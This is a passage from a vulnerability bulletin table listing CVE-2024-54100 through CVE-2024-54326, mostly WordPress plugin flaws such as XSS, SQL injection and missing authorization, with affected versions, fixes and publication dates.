Vulnerability of improper access control in the secure input module Impact: Successful exploitation of this vulnerability may cause features to perform abnormally. | 2024-12-12 | not yet calculated | CVE-2024-54100 |
| n/a -- n/a |
Denial of service (DoS) vulnerability in the installation module Impact: Successful exploitation of this vulnerability will affect availability. | 2024-12-12 | not yet calculated | CVE-2024-54101 |
| n/a -- n/a |
Race condition vulnerability in the DDR module Impact: Successful exploitation of this vulnerability may affect service confidentiality. | 2024-12-12 | not yet calculated | CVE-2024-54102 |
| n/a -- n/a |
Cross-process screen stack vulnerability in the UIExtension module Impact: Successful exploitation of this vulnerability may affect service confidentiality. | 2024-12-12 | not yet calculated | CVE-2024-54119 |
| n/a -- n/a |
Concurrent variable access vulnerability in the ability module Impact: Successful exploitation of this vulnerability may affect availability. | 2024-12-12 | not yet calculated | CVE-2024-54122 |
| n/a -- n/a |
Action Pack is a framework for handling and responding to web requests. There is a possible Cross Site Scripting (XSS) vulnerability in the `content_security_policy` helper starting in version 5.2.0 of Action Pack and prior to versions 7.0.8.7, 7.1.5.1, 7.2.2.1, and 8.0.0.1. Applications which set Content-Security-Policy (CSP) headers dynamically from untrusted user input may be vulnerable to carefully crafted inputs being able to inject new directives into the CSP. This could lead to a bypass of the CSP and its protection against XSS and other attacks. Versions 7.0.8.7, 7.1.5.1, 7.2.2.1, and 8.0.0.1 contain a fix. As a workaround, applications can avoid setting CSP headers dynamically from untrusted input, or can validate/sanitize that input. | 2024-12-10 | not yet calculated | CVE-2024-54133 |
| n/a -- n/a |
Combodo iTop is an open source and web-based IT service management platform. Prior to versions 2.7.11, 3.1.2, and 3.2.0., iTop has a cross-site scripting vulnerability that can lead to cross-site request forgery on the `_table_id` parameter. Versions 2.7.11, 3.1.2, and 3.2.0 contain a patch for the issue. | 2024-12-13 | not yet calculated | CVE-2024-54139 |
| n/a -- n/a |
Altair is a GraphQL client for all platforms. Prior to version 8.0.5, Altair GraphQL Client's desktop app does not validate HTTPS certificates allowing a man-in-the-middle to intercept all requests. Any Altair users on untrusted networks (eg. public wifi, malicious DNS servers) may have all GraphQL request and response headers and bodies fully compromised including authorization tokens. The attack also allows obtaining full access to any signed-in Altair GraphQL Cloud account and replacing payment checkout pages with a malicious website. Version 8.0.5 fixes the issue. | 2024-12-09 | not yet calculated | CVE-2024-54147 |
| n/a -- n/a |
Winter is a free, open-source content management system (CMS) based on the Laravel PHP framework. Winter CMS prior to versions 1.2.7, 1.1.11, and 1.0.476 allow users with access to the CMS templates sections that modify Twig files to bypass the sandbox placed on Twig files and modify resources such as theme customisation values or modify, or remove, templates in the theme even if not provided direct access via the permissions. As all objects passed through to Twig are references to the live objects, it is also possible to also manipulate model data if models are passed directly to Twig, including changing attributes or even removing records entirely. In most cases, this is unwanted behavior and potentially dangerous. To actively exploit this security issue, an attacker would need access to the Backend with a user account with any of the following permissions: `cms.manage_layouts`; `cms.manage_pages`; or `cms.manage_partials`. The Winter CMS maintainers strongly recommend that these permissions only be reserved to trusted administrators and developers in general. The maintainers of Winter CMS have significantly increased the scope of the sandbox, effectively making all models and datasources read-only in Twig, in versions 1.2.7, 1.1.11, and 1.0.476. Thse who cannot upgrade may apply commit fb88e6fabde3b3278ce1844e581c87dcf7daee22 to their Winter CMS installation manually to resolve the issue. In the rare event that a Winter user was relying on being able to write to models/datasources within their Twig templates, they should instead use or create components to make changes to their models. | 2024-12-09 | not yet calculated | CVE-2024-54149 |
| n/a -- n/a |
Directus is a real-time API and App dashboard for managing SQL database content. Starting in version 11.0.0 and prior to version 11.3.0, when setting `WEBSOCKETS_GRAPHQL_AUTH` or `WEBSOCKETS_REST_AUTH` to "public", an unauthenticated user is able to do any of the supported operations (CRUD, subscriptions) with full admin privileges. This impacts any Directus instance that has either `WEBSOCKETS_GRAPHQL_AUTH` or `WEBSOCKETS_REST_AUTH` set to `public` allowing unauthenticated users to subscribe for changes on any collection or do REST CRUD operations on user defined collections ignoring permissions. Version 11.3.0 fixes the issue. | 2024-12-09 | not yet calculated | CVE-2024-54151 |
| n/a -- n/a |
Angular Expressions provides expressions for the Angular.JS web framework as a standalone module. Prior to version 1.4.3, an attacker can write a malicious expression that escapes the sandbox to execute arbitrary code on the system. With a more complex (undisclosed) payload, one can get full access to Arbitrary code execution on the system. The problem has been patched in version 1.4.3 of Angular Expressions. Two possible workarounds are available. One may either disable access to `__proto__` globally or make sure that one uses the function with just one argument. | 2024-12-10 | not yet calculated | CVE-2024-54152 |
| n/a -- n/a |
SAP NetWeaver Administrator(System Overview) allows an authenticated attacker to enumerate accessible HTTP endpoints in the internal network by specially crafting HTTP requests. On successful exploitation this can result in Server-Side Request Forgery (SSRF) which could have a low impact on integrity and confidentiality of data. It has no impact on availability of the application. | 2024-12-10 | not yet calculated | CVE-2024-54197 |
| n/a -- n/a |
In certain conditions, SAP NetWeaver Application Server ABAP allows an authenticated attacker to craft a Remote Function Call (RFC) request to restricted destinations, which can be used to expose credentials for a remote service. These credentials can then be further exploited to completely compromise the remote service, potentially resulting in a significant impact on the confidentiality, integrity, and availability of the application. | 2024-12-10 | not yet calculated | CVE-2024-54198 |
| n/a -- n/a |
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Envato Security Team Revy.This issue affects Revy: from n/a through 1.18. | 2024-12-09 | not yet calculated | CVE-2024-54215 |
| n/a -- n/a |
Missing Authorization vulnerability in Repute info systems ARForms.This issue affects ARForms: from n/a through 6.4.1. | 2024-12-09 | not yet calculated | CVE-2024-54217 |
| n/a -- n/a |
Missing Authorization vulnerability in Thehp AIO Contact.This issue affects AIO Contact: from n/a through 2.8.1. | 2024-12-09 | not yet calculated | CVE-2024-54218 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Thehp AIO Contact.This issue affects AIO Contact: from n/a through 2.8.1. | 2024-12-09 | not yet calculated | CVE-2024-54219 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Roninwp FAT Services Booking allows Stored XSS.This issue affects FAT Services Booking: from n/a through 5.6. | 2024-12-09 | not yet calculated | CVE-2024-54220 |
| n/a -- n/a |
Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) vulnerability in Contact Form - Repute InfoSystems ARForms Form Builder allows Code Injection.This issue affects ARForms Form Builder: from n/a through 1.7.1. | 2024-12-09 | not yet calculated | CVE-2024-54223 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in QuomodoSoft ElementsReady Addons for Elementor allows DOM-Based XSS.This issue affects ElementsReady Addons for Elementor: from n/a through 6.4.7. | 2024-12-09 | not yet calculated | CVE-2024-54224 |
| n/a -- n/a |
Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in CodegearThemes Designer allows PHP Local File Inclusion.This issue affects Designer: from n/a through 1.3.3. | 2024-12-09 | not yet calculated | CVE-2024-54225 |
| n/a -- n/a |
Cross-Site Request Forgery (CSRF) vulnerability in Karl Kiesinger Country Blocker allows Stored XSS.This issue affects Country Blocker: from n/a through 3.2. | 2024-12-09 | not yet calculated | CVE-2024-54226 |
| n/a -- n/a |
Missing Authorization vulnerability in theDotstore Minimum and Maximum Quantity for WooCommerce allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Minimum and Maximum Quantity for WooCommerce: from n/a through 2.0.0. | 2024-12-09 | not yet calculated | CVE-2024-54227 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WebOccult Technologies Pvt Ltd Wot Elementor Widgets allows DOM-Based XSS.This issue affects Wot Elementor Widgets: from n/a through 1.0.1. | 2024-12-09 | not yet calculated | CVE-2024-54228 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WPRealizer Unlock Addons for Elementor allows DOM-Based XSS.This issue affects Unlock Addons for Elementor: from n/a through 1.0.0. | 2024-12-09 | not yet calculated | CVE-2024-54230 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in anzia Ni WooCommerce Order Export allows Reflected XSS.This issue affects Ni WooCommerce Order Export: from n/a through 3.1.6. | 2024-12-13 | not yet calculated | CVE-2024-54231 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in rrdevs RRAddons for Elementor allows Stored XSS.This issue affects RRAddons for Elementor: from n/a through 1.1.0. | 2024-12-09 | not yet calculated | CVE-2024-54232 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Enea Overclokk Advanced Control Manager for WordPress by ItalyStrap allows Reflected XSS.This issue affects Advanced Control Manager for WordPress by ItalyStrap: from n/a through 2.16.0. | 2024-12-13 | not yet calculated | CVE-2024-54233 |
| n/a -- n/a |
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in wp-buy Limit Login Attempts allows SQL Injection.This issue affects Limit Login Attempts: from n/a through 5.5. | 2024-12-13 | not yet calculated | CVE-2024-54234 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Shiptimize Shiptimize for WooCommerce allows Reflected XSS.This issue affects Shiptimize for WooCommerce: from n/a through 3.1.86. | 2024-12-13 | not yet calculated | CVE-2024-54235 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in anzia Ni WooCommerce Bulk Product Editor allows Reflected XSS.This issue affects Ni WooCommerce Bulk Product Editor: from n/a through 1.4.5. | 2024-12-13 | not yet calculated | CVE-2024-54236 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in anzia Ni CRM Lead allows Reflected XSS.This issue affects Ni CRM Lead: from n/a through 1.3.0. | 2024-12-13 | not yet calculated | CVE-2024-54237 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Colin Tomele Board Document Manager from CHUHPL allows Reflected XSS.This issue affects Board Document Manager from CHUHPL: from n/a through 1.9.1. | 2024-12-13 | not yet calculated | CVE-2024-54238 |
| n/a -- n/a |
Missing Authorization vulnerability in dugudlabs Eyewear prescription form allows Privilege Escalation.This issue affects Eyewear prescription form: from n/a through 4.0.18. | 2024-12-13 | not yet calculated | CVE-2024-54239 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Blaze Online Blaze Online eParcel for WooCommerce allows Reflected XSS.This issue affects Blaze Online eParcel for WooCommerce: from n/a through 1.3.3. | 2024-12-13 | not yet calculated | CVE-2024-54240 |
| n/a -- n/a |
Missing Authorization vulnerability in Appsbd Elite Notification - Sales Popup, Social Proof, FOMO & WooCommerce Notification allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Elite Notification - Sales Popup, Social Proof, FOMO & WooCommerce Notification: from 1.5 through n/a. | 2024-12-13 | not yet calculated | CVE-2024-54241 |
| n/a -- n/a |
Missing Authorization vulnerability in Appsbd Simple Notification allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Simple Notification: from n/a through 1.3. | 2024-12-13 | not yet calculated | CVE-2024-54242 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Think201 Echoza allows Stored XSS.This issue affects Echoza: from n/a through 0.1.1. | 2024-12-13 | not yet calculated | CVE-2024-54243 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Think201 Easy Replace allows Stored XSS.This issue affects Easy Replace: from n/a through 1.3. | 2024-12-13 | not yet calculated | CVE-2024-54244 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Think201 Clients allows Stored XSS.This issue affects Clients: from n/a through 1.1.4. | 2024-12-13 | not yet calculated | CVE-2024-54245 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Think201 FAQs allows Stored XSS.This issue affects FAQs: from n/a through 1.0.2. | 2024-12-13 | not yet calculated | CVE-2024-54246 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ABCBiz ABCBiz Addons and Templates for Elementor allows Stored XSS.This issue affects ABCBiz Addons and Templates for Elementor: from n/a through 2.0.2. | 2024-12-09 | not yet calculated | CVE-2024-54247 |
| n/a -- n/a |
Cross-Site Request Forgery (CSRF) vulnerability in Michael DUMONTET eewee admin custom allows Privilege Escalation.This issue affects eewee admin custom: from n/a through 1.8.2.4. | 2024-12-13 | not yet calculated | CVE-2024-54248 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Prodigy Commerce Prodigy Commerce allows DOM-Based XSS.This issue affects Prodigy Commerce: from n/a through 3.0.8. | 2024-12-13 | not yet calculated | CVE-2024-54250 |
| n/a -- n/a |
Missing Authorization vulnerability in Prodigy Commerce Prodigy Commerce allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Prodigy Commerce: from n/a through 3.0.9. | 2024-12-09 | not yet calculated | CVE-2024-54251 |
| n/a -- n/a |
Missing Authorization vulnerability in PINPOINT.WORLD Pinpoint Booking System allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Pinpoint Booking System: from n/a through 2.9.9.5.2. | 2024-12-13 | not yet calculated | CVE-2024-54252 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Xpro Xpro Elementor Addons allows Stored XSS.This issue affects Xpro Elementor Addons: from n/a through 1.4.6.1. | 2024-12-09 | not yet calculated | CVE-2024-54253 |
| n/a -- n/a |
Missing Authorization vulnerability in Kofi Mokome Message Filter for Contact Form 7.This issue affects Message Filter for Contact Form 7: from n/a through 1.6.3. | 2024-12-09 | not yet calculated | CVE-2024-54254 |
| n/a -- n/a |
URL Redirection to Untrusted Site ('Open Redirect') vulnerability in aviplugins.com Login Widget With Shortcode allows Phishing.This issue affects Login Widget With Shortcode: from n/a through 6.1.2. | 2024-12-09 | not yet calculated | CVE-2024-54255 |
| n/a -- n/a |
Missing Authorization vulnerability in Seerox Easy Blocks pro allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects Easy Blocks pro: from n/a through 1.0.21. | 2024-12-13 | not yet calculated | CVE-2024-54256 |
| n/a -- n/a |
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in anzia Ni CRM Lead allows SQL Injection.This issue affects Ni CRM Lead: from n/a through 1.3.0. | 2024-12-13 | not yet calculated | CVE-2024-54258 |
| n/a -- n/a |
Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in DELUCKS GmbH DELUCKS SEO allows Path Traversal.This issue affects DELUCKS SEO: from n/a through 2.5.5. | 2024-12-13 | not yet calculated | CVE-2024-54259 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in BlazeThemes News Kit Elementor Addons allows Stored XSS.This issue affects News Kit Elementor Addons: from n/a through 1.2.2. | 2024-12-09 | not yet calculated | CVE-2024-54260 |
| n/a -- n/a |
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in HK Digital Agency LLC TAX SERVICE Electronic HDM allows SQL Injection.This issue affects TAX SERVICE Electronic HDM: from n/a through 1.1.2. | 2024-12-13 | not yet calculated | CVE-2024-54261 |
| n/a -- n/a |
Unrestricted Upload of File with Dangerous Type vulnerability in Siddharth Nagar Import Export For WooCommerce allows Upload a Web Shell to a Web Server.This issue affects Import Export For WooCommerce: from n/a through 1.5. | 2024-12-13 | not yet calculated | CVE-2024-54262 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in César Morillas Shortcodes Blocks Creator Ultimate allows Reflected XSS.This issue affects Shortcodes Blocks Creator Ultimate: from n/a through 2.2.0. | 2024-12-13 | not yet calculated | CVE-2024-54264 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in UkrSolution Barcode Scanner with Inventory & Order Manager allows Reflected XSS.This issue affects Barcode Scanner with Inventory & Order Manager: from n/a through 1.6.6. | 2024-12-13 | not yet calculated | CVE-2024-54265 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ImageRecycle ImageRecycle pdf & image compression allows Reflected XSS.This issue affects ImageRecycle pdf & image compression: from n/a through 3.1.16. | 2024-12-13 | not yet calculated | CVE-2024-54266 |
| n/a -- n/a |
Missing Authorization vulnerability in CreativeMindsSolutions CM Answers allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects CM Answers: from n/a through 3.2.6. | 2024-12-13 | not yet calculated | CVE-2024-54267 |
| n/a -- n/a |
Missing Authorization vulnerability in SiteOrigin SiteOrigin Widgets Bundle allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects SiteOrigin Widgets Bundle: from n/a through 1.64.0. | 2024-12-13 | not yet calculated | CVE-2024-54268 |
| n/a -- n/a |
Missing Authorization vulnerability in Ninja Team Notibar allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Notibar: from n/a through 2.1.4. | 2024-12-11 | not yet calculated | CVE-2024-54269 |
| n/a -- n/a |
Missing Authorization vulnerability in WPTaskForce WPCargo Track & Trace allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WPCargo Track & Trace: from n/a through 7.0.6. | 2024-12-13 | not yet calculated | CVE-2024-54271 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in RadiusTheme Radius Blocks - WordPress Gutenberg Blocks allows Stored XSS.This issue affects Radius Blocks - WordPress Gutenberg Blocks: from n/a through 2.1.2. | 2024-12-13 | not yet calculated | CVE-2024-54272 |
| n/a -- n/a |
Deserialization of Untrusted Data vulnerability in PickPlugins Mail Picker allows Object Injection.This issue affects Mail Picker: from n/a through 1.0.14. | 2024-12-13 | not yet calculated | CVE-2024-54273 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Octrace Studio WordPress HelpDesk & Support Ticket System Plugin - Octrace Support allows Reflected XSS.This issue affects WordPress HelpDesk & Support Ticket System Plugin - Octrace Support: from n/a through 1.2.7. | 2024-12-13 | not yet calculated | CVE-2024-54274 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Wibergs Web CSV to html allows Reflected XSS.This issue affects CSV to html: from n/a through 3.04. | 2024-12-13 | not yet calculated | CVE-2024-54275 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Felix Moira Poll Builder allows Stored XSS.This issue affects Poll Builder: from n/a through 1.3.5. | 2024-12-13 | not yet calculated | CVE-2024-54276 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Alireza aliniya Nias course allows DOM-Based XSS.This issue affects Nias course: from n/a through 1.2.1. | 2024-12-13 | not yet calculated | CVE-2024-54277 |
| n/a -- n/a |
Missing Authorization vulnerability in Plugin Devs News Ticker for Elementor allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects News Ticker for Elementor: from n/a through 2.1.3. | 2024-12-13 | not yet calculated | CVE-2024-54278 |
| n/a -- n/a |
Deserialization of Untrusted Data vulnerability in Themeum WP Mega Menu allows Object Injection.This issue affects WP Mega Menu: from n/a through 1.4.2. | 2024-12-13 | not yet calculated | CVE-2024-54282 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Sendsmaily LLC Smaily for WP allows Stored XSS.This issue affects Smaily for WP: from n/a through 3.1.2. | 2024-12-13 | not yet calculated | CVE-2024-54286 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Best Wp Developer Advanced Blog Post Block allows Stored XSS.This issue affects Advanced Blog Post Block: from n/a through 1.0.4. | 2024-12-13 | not yet calculated | CVE-2024-54287 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in LDD Web Design LDD Directory Lite allows Reflected XSS.This issue affects LDD Directory Lite: from n/a through 3.3. | 2024-12-13 | not yet calculated | CVE-2024-54288 |
| n/a -- n/a |
Missing Authorization vulnerability in Awesome Support Team Awesome Support allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Awesome Support: from n/a through 6.3.0. | 2024-12-13 | not yet calculated | CVE-2024-54289 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Justin Fletcher Role Includer allows Reflected XSS.This issue affects Role Includer: from n/a through 1.6. | 2024-12-13 | not yet calculated | CVE-2024-54290 |
| n/a -- n/a |
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Appsplate Appsplate allows SQL Injection.This issue affects Appsplate: from n/a through 2.1.3. | 2024-12-13 | not yet calculated | CVE-2024-54292 |
| n/a -- n/a |
Incorrect Privilege Assignment vulnerability in CE21 CE21 Suite allows Privilege Escalation.This issue affects CE21 Suite: from n/a through 2.2.0. | 2024-12-13 | not yet calculated | CVE-2024-54293 |
| n/a -- n/a |
Authentication Bypass Using an Alternate Path or Channel vulnerability in appgenixinfotech Firebase OTP Authentication allows Authentication Bypass.This issue affects Firebase OTP Authentication: from n/a through 1.0.1. | 2024-12-13 | not yet calculated | CVE-2024-54294 |
| n/a -- n/a |
Authentication Bypass Using an Alternate Path or Channel vulnerability in InspireUI ListApp Mobile Manager allows Authentication Bypass.This issue affects ListApp Mobile Manager: from n/a through 1.7.7. | 2024-12-13 | not yet calculated | CVE-2024-54295 |
| n/a -- n/a |
Authentication Bypass Using an Alternate Path or Channel vulnerability in Codexpert, Inc CoSchool LMS allows Authentication Bypass.This issue affects CoSchool LMS: from n/a through 1.2. | 2024-12-13 | not yet calculated | CVE-2024-54296 |
| n/a -- n/a |
Authentication Bypass Using an Alternate Path or Channel vulnerability in www.vbsso.com vBSSO-lite allows Authentication Bypass.This issue affects vBSSO-lite: from n/a through 1.4.3. | 2024-12-13 | not yet calculated | CVE-2024-54297 |
| n/a -- n/a |
Missing Authorization vulnerability in Bill Minozzi Car Dealer allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Car Dealer: from n/a through 4.46. | 2024-12-13 | not yet calculated | CVE-2024-54298 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Revi Revi.io allows Reflected XSS.This issue affects Revi.io: from n/a through 5.7.3. | 2024-12-13 | not yet calculated | CVE-2024-54299 |
| n/a -- n/a |
Cross-Site Request Forgery (CSRF) vulnerability in Neuralabz LTD. AutoWP allows Cross Site Request Forgery.This issue affects AutoWP: from n/a through 2.0.8. | 2024-12-13 | not yet calculated | CVE-2024-54300 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in FormFacade FormFacade allows Reflected XSS.This issue affects FormFacade: from n/a through 1.3.6. | 2024-12-13 | not yet calculated | CVE-2024-54301 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Vikas Ratudi VForm allows Reflected XSS.This issue affects VForm: from n/a through 3.0.0. | 2024-12-13 | not yet calculated | CVE-2024-54302 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Ido Kobelkowsky / yalla ya! Simple Payment allows Reflected XSS.This issue affects Simple Payment: from n/a through 2.3.7. | 2024-12-13 | not yet calculated | CVE-2024-54303 |
| n/a -- n/a |
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Hive Support Hive Support - WordPress Help Desk allows SQL Injection.This issue affects Hive Support - WordPress Help Desk: from n/a through 1.1.2. | 2024-12-13 | not yet calculated | CVE-2024-54304 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in woocs J&T Express Malaysia allows Reflected XSS.This issue affects J&T Express Malaysia: from n/a through 2.0.13. | 2024-12-13 | not yet calculated | CVE-2024-54305 |
| n/a -- n/a |
Cross-Site Request Forgery (CSRF) vulnerability in KCT AIKCT Engine Chatbot, ChatGPT, Gemini, GPT-4o Best AI Chatbot allows Cross Site Request Forgery.This issue affects AIKCT Engine Chatbot, ChatGPT, Gemini, GPT-4o Best AI Chatbot: from n/a through 1.6.2. | 2024-12-13 | not yet calculated | CVE-2024-54306 |
| n/a -- n/a |
Cross-Site Request Forgery (CSRF) vulnerability in AIpost AIcomments allows Cross Site Request Forgery.This issue affects AIcomments: from n/a through 1.4.1. | 2024-12-13 | not yet calculated | CVE-2024-54307 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in CurrencyRate.today Cryptocurrency Price Widget allows Stored XSS.This issue affects Cryptocurrency Price Widget: from n/a through 1.2.3. | 2024-12-13 | not yet calculated | CVE-2024-54308 |
| n/a -- n/a |
Insertion of Sensitive Information Into Sent Data vulnerability in wpdebuglog PostBox allows Retrieve Embedded Sensitive Data.This issue affects PostBox: from n/a through 1.0.4. | 2024-12-13 | not yet calculated | CVE-2024-54309 |
| n/a -- n/a |
Missing Authorization vulnerability in Aslam Khan Gouran Gou Manage My Account Menu allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects Gou Manage My Account Menu: from n/a through 1.0.1.8. | 2024-12-13 | not yet calculated | CVE-2024-54310 |
| n/a -- n/a |
Missing Authorization vulnerability in i.lychkov Mark New Posts allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Mark New Posts: from n/a through 7.5.1. | 2024-12-13 | not yet calculated | CVE-2024-54311 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ??????? ????? Persian Woocommerce SMS allows Reflected XSS.This issue affects Persian Woocommerce SMS: from n/a through 7.0.5. | 2024-12-13 | not yet calculated | CVE-2024-54312 |
| n/a -- n/a |
Path Traversal vulnerability in FULL. FULL Customer allows Path Traversal.This issue affects FULL Customer: from n/a through 3.1.25. | 2024-12-13 | not yet calculated | CVE-2024-54313 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in NicheAddons Primary Addon for Elementor allows Stored XSS.This issue affects Primary Addon for Elementor: from n/a through 1.6.0. | 2024-12-13 | not yet calculated | CVE-2024-54314 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in NicheAddons Events Addon for Elementor allows DOM-Based XSS.This issue affects Events Addon for Elementor: from n/a through 2.2.2. | 2024-12-13 | not yet calculated | CVE-2024-54315 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in NicheAddons Restaurant & Cafe Addon for Elementor allows DOM-Based XSS.This issue affects Restaurant & Cafe Addon for Elementor: from n/a through 1.5.8. | 2024-12-13 | not yet calculated | CVE-2024-54316 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Google Web Stories allows Stored XSS.This issue affects Web Stories: from n/a through 1.37.0. | 2024-12-13 | not yet calculated | CVE-2024-54317 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in nicejob NiceJob allows Stored XSS.This issue affects NiceJob: from n/a through 3.6.5. | 2024-12-13 | not yet calculated | CVE-2024-54318 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in MultiNet Interactive AB Kundgenerator allows Reflected XSS.This issue affects Kundgenerator: from n/a through 1.0.6. | 2024-12-13 | not yet calculated | CVE-2024-54319 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ICDSoft Hosting ICDSoft Reseller Store allows Reflected XSS.This issue affects ICDSoft Reseller Store: from n/a through 2.4.5. | 2024-12-13 | not yet calculated | CVE-2024-54320 |
| n/a -- n/a |
Cross-Site Request Forgery (CSRF) vulnerability in Hive Support Hive Support - WordPress Help Desk allows Cross Site Request Forgery.This issue affects Hive Support - WordPress Help Desk: from n/a through 1.1.2. | 2024-12-13 | not yet calculated | CVE-2024-54321 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Ederson Peka Media Downloader allows Reflected XSS.This issue affects Media Downloader: from n/a through 0.4.7.4. | 2024-12-13 | not yet calculated | CVE-2024-54322 |
| n/a -- n/a |
Missing Authorization vulnerability in WPExpertsio New User Approve allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects New User Approve: from n/a through 2.6.2. | 2024-12-13 | not yet calculated | CVE-2024-54323 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Cloud Inn SMSify allows Reflected XSS.This issue affects SMSify: from n/a through 6.0.4. | 2024-12-13 | not yet calculated | CVE-2024-54324 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in DealerTrend CarDealerPress allows Reflected XSS.This issue affects CarDealerPress: from n/a through 6.6.2410.02. | 2024-12-13 | not yet calculated | CVE-2024-54325 |
| n/a -- n/a |
Missing Authorization vulnerability in Eyal Fitoussi GEO my WordPress allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects GEO my WordPress: from n/a through 4.5.0.4. | 2024-12-13 | not yet calculated | CVE-2024-54326 |
| n/a -- n/a |
